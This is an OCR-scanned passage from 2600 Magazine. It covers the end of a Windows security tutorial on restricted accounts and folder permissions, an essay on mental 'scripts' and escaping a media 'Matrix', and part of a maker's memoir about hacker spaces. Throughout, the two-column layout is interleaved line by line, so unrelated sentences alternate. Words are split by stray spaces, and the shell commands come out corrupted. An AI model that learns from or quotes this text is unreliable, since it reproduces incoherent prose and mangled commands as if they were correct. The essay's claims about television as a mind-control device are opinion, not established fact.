it to his satisfaction that the insta l l program
quits with an "Access denied - User has no
administrative privi leges" error.
advises creating a single account cal led Ox06. Dealing with
"SuperUser" that can be used to create troublesome applications:
general user accounts, and for system A year after rei nsta l l ing his system i n
administration a t a later date. this way, everyone is sti l l happy with how
After even more waiting around wh ilst wel l it's working. Although the system does
Windows gets its first-run act together, John slow down every so often thanks to the
is final ly logged in as "SuperUser" and gets large number of system services instal led
a default Windows desktop. Before doi ng (security software, iTunes, and several
anythi ng else, Bob shows him how to turn cel lphone appl ication suites), the number
on the Windows firewal l (My Computer of malware and virus alerts has remai ned
> Network Connections > Right-cl ick the very low - such alerts often being traced
Internet connection > Select "Properties" > to game i nsta l l packages downloaded by
Cl ick the "Advanced" tab > Check the box the chi ldren, that wou ld be checked and
and cl ick "Apply") and he sets it up with the verified by John first before i nstallation via
"Don't al low exceptions" rule. John then the SuperUser account if that appl ication
reconnects his Ethernet cable, activates was considered safe.
Windows over the Internet, and updates his However, there is one problem: David,
machine using Windows U pdate. Now his having recently developed a serious
machine has been fu l ly updated with the addiction to World of Warcraft (WoW) is
latest security patches, and the most up-to- requesting that his user account be made
date settings for default users have been i nto an Administrator's account. The reason
appl ied. is because WoW is frequently updated
After updating Windows with the latest with new patches and software updates,
security patches and making a "clean start" and although David can play the game fine
system restore point (Start > Programs > with a restricted account, updates need to
Accessories > SystemTools > System Restore) be i nstal led as the "SuperUser". It normally
he proceeds to the "User Accounts" control runs under David's account, and thus only
panel to create logons for himself, his has read permissions for the WoW program
wife, and kids. Before doi ng anythi ng else folder, and John can't always be there to
though, he sets a suitably strong password update the game as soon as a new patch
for the "SuperUser" account so that only is released. Noting that the majority of
authorized users (himself and Bob i n this malware and virus alerts on the system are
case) can perform system-wide changes traced to fi les stored in David's account,
and application i nstallations. After this, he John is rightly agai nst the idea of giving
creates new accounts for everyone and David's account administrative rights. He
ensures that everyone, h imself i ncluded, consults Bob for advice on how to work
Page 22 ------------------- 2600 Magazine

around the problem without placing the
system at risk.
Bob knows that every file and folder on
an NTFS drive has an Access Control List
(or ACL) attached to it that controls which
users can access, create, or change that file.
Noting that David is the only fam i ly member
who uses WoW, he logs in as "SuperUser",
opens the command prompt (Start > Run >
type "
corrunand . com
"
and h it [Enter] ), changes
to the "Program Files" folder by typing
"CD pro gra� l
"
[Enter] (which is a DOS
short-path and shou ld be valid on Win XP
and Vista PCs), and checks the ACL for the
World of Warcraft folder by typi ng "
cac l s
Worldo � l
"
[Enterj . This shows a l ist of which
users have access to the WoW folder; All
users can read it, but only administrators can
make changes. Typing "cacls /?" wi l l display
a brief guide to using the command.
The next step is best done only by
experienced computer users: Bob decides
to give David fu l l access rights to the World
of Warcraft folder, and uses the command
"Properties" > Click the "Advanced" button
under the "Shortcut" tab > Select "Run As"
or "Run with different credentials") i nstead
of the current user's account. An additional
benefit to th is approach, assuming that
the "Protect my files, folders and settings"
option is checked, is that anything running
under that account, including malware, wi l l
be denied access to user files o r folders by
Windows. However this technique would
inh ibit legitimate read/write operations to
user fi les if it was appl ied to a program that
uses them, such as Microsoft Word.
Fol lowing Bob's simple modification
to the WoW folder ACL, David has been
able to play and update World of Warcraft
himself, without needing John or Bob to
log in under the "SuperUser" account.This
has saved David a lot of inconvenience and
waiting around, and John no longer has
to deal with conti nual requests and SMS
messages asking him to come home and
update WoW as soon as he can !
"
cacl s Wor l do � l IT I E IC IG David:F". Ox07. Windows security and
This gives David ful l read/write/modify/ best-practice summary:
execute rights to the WoW program For those who have lost a l l track of what
folder and every fi le and folder below it. I am saying thanks to the sheer vol ume of
After verifying the output, Bob logs out of text above, here is a brief "bu l let-point"
"SuperUser" and asks David to log in and summary of the article:
try running WoW to see if the changes to • Windows 2000, XP and Vista a l l use
the ACL were successfu l . David tries some the more secure NTFS fi lesystem by
functions that would result in data being defau lt, and this makes it easier to
changed on the hard drive (performi ng a control which users can do what. If
WoW update, taking i n-game screenshots, you're sti l l using Windows 98 or ME (or
and setting up character macros are three horror of horrors, Wi ndows 95 !) with
such tests that can be performed), and a FAT filesystem, consider upgrading
finds that now the i n-game screenshots and your operating system as quickly as
character macros have been saved to the possible. This also appl ies to Windows
WoW program folders successful l y. 2000/XP computers upgraded from
As a precaution, Bob also adds a shortcut Windows 95/98/ME that are sti l l using
to David's startup folder (Start > Programs > a FAT filesystem on the hard drive
Startup) that fires up the antivirus program instead of NTFS.
and performs a fu l l scan on the WoW folder • Fi rewalls may prevent malware from
to make sure that no malware i nfections sending data (keylogging i nfo, etc.)
i n the WoW folder go undetected, before to external servers, but they won't
WoW itself is run. stop viruses or malware from arriving
Another approach to solving this on a machine if a user unknowingly
problem, useful if an appl ication is downloads them in the first place.
accessed by multiple users, is to create a Most firewalls al low known web
new restricted user account specifically browsers (IE and Firefox, to name but a
for that program, give the account read/ few) to always connect to the I nternet,
write or ful l access to the relevant folder effectively throwing open the door for
using CACLS, and change the appl ication mal icious data to come through if the
shortcuts to make sure that the program user opens the connection in the first
is run under the application-specific place.
account (Right-cl ick the shortcut > Select • Viruses and malware can onlY run with
Winter 2008-2009 ----------------- Page 23

the same privi leges as the current user,
at least unti l they are run under an
account with admin rights. Therefore,
if the current user account is a
restricted one, any malware programs
running under it wi l l only be able to
change data under the user's own data
folders and "shared documents", and
wi l l have a great degree of difficulty
insta l l ing themselves as a system-wide
appl ication or service.
• When using Windows 2000, XP or
Vista, the best practice is to make a l l
user accounts (i .e. the one that you use
to log on to Windows) restricted ones,
and only use accounts with admin
privileges for system mai ntenance.
This is esperially important where
accounts used by chi ldren or teenagers
are concerned. On the same token,
one shou ld always be very careful
when logging onto an account with
administrative rights, and make sure
that you don't run anythi ng that is
potentia l ly unsafe. Do a cold boot
(shutdown, wait a minute, then power
up again) if you consider it necessary.
• Windows 2000 and XP users beware
that accounts created using the initial
Wi ndows welcome and setup screens
are given administrative privi leges by
default, and it's very hard to change
them to restricted accounts later
on. Just create a single "SuperUser"
account (use whatever name you wish)
to get past the setup screens, and create
restricted accounts later on. This might
not apply to Vista users, but you shou ld
double-check this by looking carefu lly
at the user account's control panel all
the Same.
• If a program needs to update itself on
a regu lar basis by writing updated files
to its own folders, consider modifying
the file/folder ACL using the CACLS
command, instead of automatical ly
giving the user of that program
administrative rights to the whole
system.
• If several users all make use of a
regu larly updated program, consider
creati ng a restricted user account
especially for that program and
configure access rights and restrictions
for that account, ensuring that the
account itself can only change the
program and directly associated fi les
that it has been created for. Remember
to set the program to only run under
that special account, instead of having
it run as the current user.
OxFF. The final word:
I hope that this tutorial has helped you
a l l learn a l ittle about how the security setup
works on Windows NT-based platforms,
and some best practices for ensuring that
your Wi ndows boxes are set up to inhibit
or reduce the damage done from unwanted
system-wide changes and malware
installations. If you need assistance with
doi ng anythi ng mentioned in this article,
there are many free support forums out
there for Windows users where you should
be able to get help much qu icker and more
easi ly than I could ever manage!
Shouts to whoever came up with the User/
Croup/Other permission system in Linux from
which the initial principles in this article are
derived and a family from Cuilciford who were
the inspiration for the case-study above, and
indeed the article itself.
- - - Hack Thyself- - -
by Kartikeya Putra
alienbaby@freaknetwork.in
http://www.hopistar.org
entities. Literally, each of us may be our
programs, nothing more, nothing less. "
- John C. L i l ly, Programming and Meta
programming in the Human Biocomputer
"All human beings, all persons who
I n the early 1 9 70s, d u r i n g the early days
reach adulthood in the world today are of Artifi c i a l I nte l l i gence resea rch, scientists
programmed biocompulers. None of us can from the fields of psychology and computer
escape our own nature as programmable science came together to try to i mprove the i r
Page 24 ------------------- 2600 Magazine

understanding of how the mind works. Their commercials on TV right now, th is bland
efforts eventually resulted in the discipl i ne dude - who looks to me l i ke he knows he i
now known as Cogn itive Science. One of is about to become a complete tool - holds
the more sign ificant books to come out up a McDonald's chicken sandwich and
of this early col laborative effort was titled proclaims, "Let's hear it for nonconformity!"
Scripts, Plans, Goals, a n d Understanding by Are you fucking kidding me? It's so phony
Roger Schank and Robert Abelson, which is it's al most avant garde. Andy Warhol wou ld
sti l l used by psychologists today to support love it - I find it disturbing. I know that
what's cal led the I nformation Processi ng there must be a lot of people out there who
Model of human cognition. In it, the authors don 't see anything wrong with this ad - and
suggested that human thi nking is based on a others who even buy i nto it, who think that
set of scripts (programs) people use to meet
eating a chicken sandwich for breakfast
really is "revolutionary."
personal goals in different situations. The
When we were teenagers, some of
example they use throughout the book is a
us correctly perceived the system as
"restaurant script" that tells people how to
hypocritical and said, "screw this, I ' m out of
behave when eating out in publ ic, in order
here." As an adult with a l ittle perspective
to meet the goal of getting fed. What would now I can see that there's noth ing wrong
you do if you ordered a hamburger and the with wanting to do your own thing, but
waitress brought you a hot dog? Your scripts rebel l ion agai nst the system is sti l l a part
tel l you how to handle this situation, what to of it. Maybe we found a peer group who
do when the bi l l comes, and how to handle claimed to represent "the resistance," the
the mu ltitude of common transactions that anti-system - but it's a trick. The anti-system
take place in the restaurant envi ronment. is sti l l part of the system. By joi ning it you
Scripts People Live by Claude Steiner is think you are becomi ng free, but it's j ust a
a book about a form of popular psychology trick. As an "outsider," if you break laws or
called Transactiona l Analysis. Here the do things that hurt yourself or others, you ' re
author talks about how everyone has a sort j ust playing into the role the system wants
of running "l ife script" which is basically the you to play - you ' re doi ng exactly what you
story of your own l ife as you l i ke to tel l it. are supposed to do as an "outsider." The
Inside this script there are recurring roles anti-system system is there because they
that are often learned in childhood, which need "bad guys" so that they can play the
inform us how people are supposed to "good guys" i n comparison. If you are good
behave. I doubt that anyone ever reaches and not one of them, the whole system
adulthood with a completely accurate collapses. That is revol utionary!
script of their own l ife story - but if you The foundation on which the whole
can become conscious of your script, it's sadomasochistic world system is erected is
possible to start improvi ng it and improving the perception of yourself as a victim. A lot
the way you write it as you go along. of people are starting to figure th is out, and
Some of our most basic programming
when that number reaches a certa in tipping
poi nt, it is going to alter the structure of the
concerns what it means to be "good" or
Matrix. Seeing yourself as the world's victim
"bad." When parents, teachers and other
is profoundly disempowering and keeps
authorities are training us how to be "good,"
you locked i n a cycle of self-created pain
often this has very l ittle to do with doing and misery. We break free from this cycle
what is right and is more about training by making a conscious decision to accept
us to behave in ways that are convenient complete responsibil ity for creating our
for them. Today the task of programming own reality. Get a copy of The Anger Habit
"real ity" has substantia l ly been taken over Workbook by Carl Semmel roth and study it
by television, which is l i ke a very-Iow- l i ke a bible. Drs. Barry and Janae Weinhold
frequency mindcontrol device that sits have an excel lent series of e-books titled
i n your l iving room, tuning you i n to the Breaking Free from the Matrix. There are a
corporate Matrix mai nframe. It is sponsored lot of wonderfu l books out there to help us
by corporations who are not concerned take control of our mi nds and emotions and
with anyth ing at a l l except sel l ing break free from the Matrix of social control
thei r products. I n one of my favorite find them, and free your mind.
Winter 2008-2009 ----------------- Page 25

We l ive i n a time where there are no to give young people as many different
l i m its to creativity. If you can imagine it, opportun ities to get hooked on different
you can make it. The technology of rapidly artistic mediums of self expression. I n the
prototyping is now at a stage where any summers when I wasn 't teachi ng I wou ld
object or project is i n the real m of the set myself artistic cha l lenges. My summer
possible. The hardware, machi nes, and time ru le was that if I cou ldn't get started
robots that wi l l do our bidd i ng are waiting making a project withi n a few days of
for people to put them to work i n work- h aving the idea, then I wou ld abandon
shops and l iving rooms. The software for the idea. I learned drawi ng, pai nting, and
designi ng what you see i n your head has ceramics ski l l s by chal lenging myself this
never been easier to acqu i re and learn . way.
We are tru ly in a renaissance of wonderfu l Then one summer, I got obsessed with
opportunities for people with an i magi na- video bloggi ng and started creating tuto
tion . When I was a kid, rapid prototyping rial videos for my students and sharing
tools only existed on science fiction TV videos on l i ne. Th is eventu a l ly turned into
shows l i ke The jetsons and Sta r Trek. a job making tutorial videos for Make
Th i ngs have changed si nce then . Magazine and Etsy.com. At the begi n n i ng
I got hooked on repurposing tech- of the week, I wou ld set myself a task and
nology and making thi ngs back when I have a tutorial video up by the end of the
was seven. My uncle, who made a l iving week. Some weeks had straightforward
getting up early and prowling the trash goals such as making a secret compart
of Boston looking for treasures to sel l at ment book or a duct tape wal let wh ile
weekend flea markets, taught me how to other more ambitious projects required
put together a working bike out of a bunch col laboration with the fol ks at the Seattle
of broken bi kes. Once I real ized that I hacker space, H ackerbot Labs. Working
cou ld take apart a b i ke and get it back with friends to create hovercrafts, drawing
together, I was obsessed with figuring out robots, and near space payloads were
how th ings worked. At the l ibrary, I wou ld some of the best times of my l ife.
settle i nto the 700 section and just read My web videos got the attention of
any books about how to make thi ngs. mainstream media and I now have a TV
I daydreamed about growing up to be a show i n the works cal led History Hacker.
mechanic with a l l the tools in my shop (The pi lot aired in September on the
that I cou ld ever want. A few years later i n H istory channel.) On the show, I explore
the early 80s, my parents had a software the l ives of inventors from h istory and
company producing chi ldren ' s software remake thei r i nventions in a way that's
for the Apple 1 1 + and the Commodore 64. accessible to parents and kids. U nti l that
I idol ized the programmer as magicians goes into production, I 've created a web
control l i ng computing machi nes! series called Things and in it, I interview
As an adult I 've been making a l iving people about thi ngs that they have made.
in one way or another by learni ng how Working on projects col l aboratively
to make something and teach i ng people is very satisfyi ng. When I moved from
what I ' ve learned. I was an art teacher i n Seattle to New York City i n 2007, I needed
Seattle Publ i c Schools and my goal was a hacker space. I visited hacker spaces
Page 26 ------------------- 2600 Magazine

2600 v25 n4 (winter 2008)

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to 2600 v25 n4 (winter 2008)

Similar to 2600 v25 n4 (winter 2008) (16)

More from Felipe Prado

More from Felipe Prado (20)

Recently uploaded

Recently uploaded (20)

2600 v25 n4 (winter 2008)